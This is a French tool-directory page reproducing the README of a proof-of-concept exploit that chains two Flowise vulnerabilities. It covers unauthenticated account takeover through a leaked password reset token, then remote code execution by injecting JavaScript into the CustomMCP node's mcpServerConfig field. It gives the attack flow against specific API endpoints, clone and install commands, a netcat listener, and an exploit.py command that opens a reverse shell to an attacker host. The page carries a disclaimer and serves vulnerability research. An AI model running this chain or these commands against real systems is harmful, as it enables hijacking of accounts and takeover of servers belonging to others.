Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/0xdaeras/flowise-cve-2025-58434-chain-59528
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationApprentissage et ÉducationLabs et Pratique
GitHub0xdaeras/flowise-cve-2025-58434-chain-59528

Flowise-CVE-2025-58434-Chain-59528

FlowiseAI CVE-2025-58434 & CVE-2025-59528 exploit PoC, démontrant un ATO non authentifié via une fuite de jeton de réinitialisation, suivi d'une RCE authentifiée. Comprend un environnement de laboratoire Docker reproductible.

Voir le dépôt
16il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Chaîne de CVEs FlowiseAI - ATO (CVE-2025-58434) et RCE (CVE-2025-59528)

CVE-2025-58434 CVSS-1 CVE-2025-59528 CVSS-2 Python License

⚠️ À des fins éducatives et de recherche en sécurité autorisée uniquement. L'utilisation de cet outil contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite est illégale.


Table des matières

Ce dépôt contient une preuve de concept en Python pour enchaîner deux vulnérabilités de Flowise :

  • CVE-2025-58434 — Prise de contrôle de compte via le comportement exposé du jeton de réinitialisation de mot de passe.
  • CVE-2025-59528 — Exécution de code à distance via une évaluation JavaScript non sécurisée dans le nœud CustomMCP.

Flowise est une plateforme glisser-déposer pour construire des applications LLM et des workflows d'agents IA. CVE-2025-59528 affecte Flowise 3.0.5 et a été corrigée dans la version 3.0.6. Le problème vient du traitement non sécurisé de mcpServerConfig à l'intérieur du nœud CustomMCP. CVE-2025-58434 est liée à l'exposition du jeton de réinitialisation de mot de passe et a également été corrigée dans Flowise 3.0.6.

L'outil prend en charge :

  • Vérification de la vulnérabilité
  • Processus de prise de contrôle de compte
  • Connexion et récupération des cookies
  • RCE authentifiée
  • Mode chaîne complète : ATO → connexion → RCE

Détails des vulnérabilités

CVE-2025-58434 — Prise de contrôle de compte

  • Identifiant CVE : CVE-2025-58434
  • Score CVSS v3.1 : 9.8 (Critique)
  • Type de vulnérabilité : Prise de contrôle de compte / Contournement d'authentification
  • Produit concerné : Flowise
  • Version affectée testée : Flowise 3.0.5
  • Version corrigée : Flowise 3.0.6
  • Authentification requise : Non
  • Impact : Divulgation du jeton de réinitialisation de mot de passe, prise de contrôle de compte

Le processus de réinitialisation de mot de passe vulnérable expose des données sensibles de l'utilisateur, y compris les jetons temporaires de réinitialisation de mot de passe, dans la réponse de l'API. Un attaquant qui connaît une adresse e-mail valide peut demander une réinitialisation de mot de passe, récupérer le jeton temporaire dans la réponse et l'utiliser pour définir un nouveau mot de passe pour le compte.

Le comportement vulnérable affecte Flowise cloud ainsi que les déploiements auto-hébergés/locaux exposant la même surface d'API. La correction consiste à ne jamais renvoyer de jetons de réinitialisation de mot de passe ni de données sensibles de réinitialisation de compte directement dans les réponses de l'API.

CVE-2025-59528 — Exécution de code à distance

  • Identifiant CVE : CVE-2025-59528
  • Score CVSS v3.1 : 10.0 (Critique)
  • Type de vulnérabilité : Injection de code JavaScript / Exécution de code à distance
  • Produit concerné : Flowise
  • Version affectée testée : Flowise 3.0.5
  • Version corrigée : Flowise 3.0.6
  • Authentification requise : Oui
  • Impact : Exécution arbitraire de JavaScript dans l'environnement Node.js, RCE sur le serveur hébergeant Flowise

La vulnérabilité existe dans le nœud CustomMCP de Flowise. Le paramètre mcpServerConfig est analysé dans le cadre du processus de configuration du serveur MCP et est évalué comme du code JavaScript sans aucune validation de sécurité. Cela permet à un attaquant authentifié d'injecter du code JavaScript arbitraire, qui est exécuté dans l'environnement Node.js du serveur Flowise. Dans la fonction convertToValidJSONString, l'entrée utilisateur est passée au constructeur Function, qui évalue l'entrée comme du code JavaScript avec tous les privilèges Node.js, permettant d'accéder à des modules comme child_process pour exécuter des commandes système.

Le point de terminaison vulnérable utilisé par cette PoC est :

POST /api/v1/node-load-method/customMCP

avec une charge utile js dans le champ mcpServerConfig du corps JSON, par exemple :

{
  "loadMethod": "listActions",
  "inputs": {
    "mcpServerConfig": "..."
  }
}

Le code vulnérable se trouve dans le fichier CustomMCP.ts et est référencé dans l'avis du mainteneur GitHub pour cette CVE.


Déroulement de l'attaque

Attaquant                                  Flowise
   │                                          │
   │  [CVE-2025-58434]                       │
   │  POST /api/v1/account/forgot-password   │
   │  { email }                              │
   │─────────────────────────────────────────►│
   │◄─────────────────────────────────────────│
   │  objet utilisateur + tempToken           │
   │                                          │
   │  POST /api/v1/account/reset-password     │
   │  { email, tempToken, newPassword }       │
   │─────────────────────────────────────────►│
   │◄─────────────────────────────────────────│
   │  mot de passe modifié                    │
   │                                          │
   │  POST /api/v1/auth/login                 │
   │  { email, newPassword }                  │
   │─────────────────────────────────────────►│
   │◄─────────────────────────────────────────│
   │  token / refreshToken / connect.sid      │
   │                                          │
   │  [CVE-2025-59528]                       │
   │  POST /api/v1/node-load-method/customMCP │
   │  mcpServerConfig=<config malveillant>    │
   │─────────────────────────────────────────►│
   │                              JS évalué dans Node.js
   │                              commande exécutée
   │◄─────────────────────────────────────────│
   │  sortie de la commande ou charge utile   │
   │                                          │
   ✓  Prise de contrôle de compte + RCE authentifiée

Structure du dépôt :

Structure du dépôt
CVE-2025-58434-CVE-2025-59528/
├── exploit.py
├── README.md
├── requirements.txt
├── docker-compose.yml
└── logs/

Installation

Outil

git clone https://github.com/0xDaeras/CVE-2025-58434-CVE-2025-59528-POC.git
cd CVE-2025-58434-CVE-2025-59528-POC
pip install -r requirements.txt

Laboratoire Docker

git clone https://github.com/0xDaeras/CVE-2024-51482-POC.git
cd CVE-2024-51482-POC
cp .env.example .env  # Configurez les variables d'environnement
docker-compose up -d

Utilisation

Comportement par défaut

Sans aucun argument, l'outil exécutera la chaîne d'attaque complète, vérifiera la vulnérabilité cible, effectuera la prise de contrôle du compte pour l'e-mail fourni, se connectera pour récupérer les cookies, puis exploitera la vulnérabilité RCE avec une charge utile de shell inverse. Lancez un écouteur dédié (par exemple, nc -lvnp 9889) avant d'exécuter l'outil en mode chaîne complète.

python3 exploit.py --target http://localhost:3000 --email [email protected] --lhost attacker.local --lport 9889

Écran d'aide

python3 exploit.py -h

Modes

check-mode

Effectue une vérification de version pour déterminer si la cible est vulnérable à CVE-2025-58434 et CVE-2025-59528. Il envoie une requête à l'API cible et analyse la réponse pour identifier la version de Flowise et l'état de la vulnérabilité.

python3 exploit.py --target http://localhost:3000 check
Télécharger l’outil